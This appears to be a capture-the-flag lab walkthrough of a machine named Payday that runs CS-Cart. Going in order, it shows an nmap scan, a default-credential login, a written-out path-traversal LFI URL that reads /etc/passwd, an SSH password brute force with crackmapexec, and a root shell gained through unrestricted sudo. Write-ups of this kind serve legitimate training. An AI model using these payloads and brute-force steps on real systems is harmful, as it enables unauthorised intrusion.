# Payday ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f1f2ae92fa735ea7edb86fe452eac4ad22c6278%2Fimage.png?alt=media) ## Nmap ``` sudo nmap 192.168.189.39 -p- -sS PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 993/tcp open imaps 995/tcp open pop3s ``` ## HTTP Default root page on port 80 takes us to a store page for CS-cart. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cbead386b4bd0f1223fa69ae1d6d1eb73c27c781%2Fimage.png?alt=media) We can see from this page that this is a demo page that is currently running. With that we can try some common login credentials. I tried admin:admin and was able to login to the web application. After logging in I could not see much had changed and was unable to find anything interesting. I quick Google search produces a potential authenticated RCE exploit. {% embed url="" %} ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01db05ea80c3e7d73081eb5e427000f94856aa37%2Fimage.png?alt=media) I could not find anywhere to upload to the file manager and after a short while decided to not proceed with this exploit for the time being. ## LFI After further research on Google we also have a potential for a LFI exploit on CS-cart. {% embed url="" %} ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f022d63d6463acdff94df571e1b0eac7af65220a%2Fimage.png?alt=media) Lets test one of these and see if we can read /etc/passwd. ``` http://192.168.189.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ee35a48346622db210436c8ea7051bb2d2cbd5fe%2Fimage.png?alt=media) We have confirmed LFI and have read the passwd file. We can take note of the user 'patrick' which is the last entry on the file. I tried reading other common LFI paths and could not find further information. The users patrick did not appear to have any SSH keys in /home/patrick/.ssh/ ## SSH Bruteforce With a known users on the system we can try bruteforcing pop3 / imap over telnet and we can try `SSH`. I first set up `crackmapexec` to brute force SSH. ``` crackmapexec ssh 192.168.189.39 -u patrick -p /usr/share/wordlists/rockyou.txt ``` We soon find a valid set of credentials. `patrick:patrick.` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c22065369d902bfd082641b46e16066e6894f9ea%2Fimage.png?alt=media) ## Low Privilege Access We now attempt to login with `SSH`. ``` ssh patrick@192.168.189.39 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2d23baa7740b51cbd1a35839715579fbbc9e8413%2Fimage.png?alt=media) ## Privilege Escalation Privilege escalation proved to be exceptionally easy on this machine. Before uploading any enumeration scripts I always perform a quick check on what we can run as sudo with `sudo -l`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dd0197b23367e026666cb9e41e990b7d1151f066%2Fimage.png?alt=media) Here we can see patrick can run sudo as any user on any command. This is a quick win as we can run sudo as root on /bin/bash to spawn a root shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0bb7a20d1d01496ca9c440e0c652b015dd5b1d90%2Fimage.png?alt=media)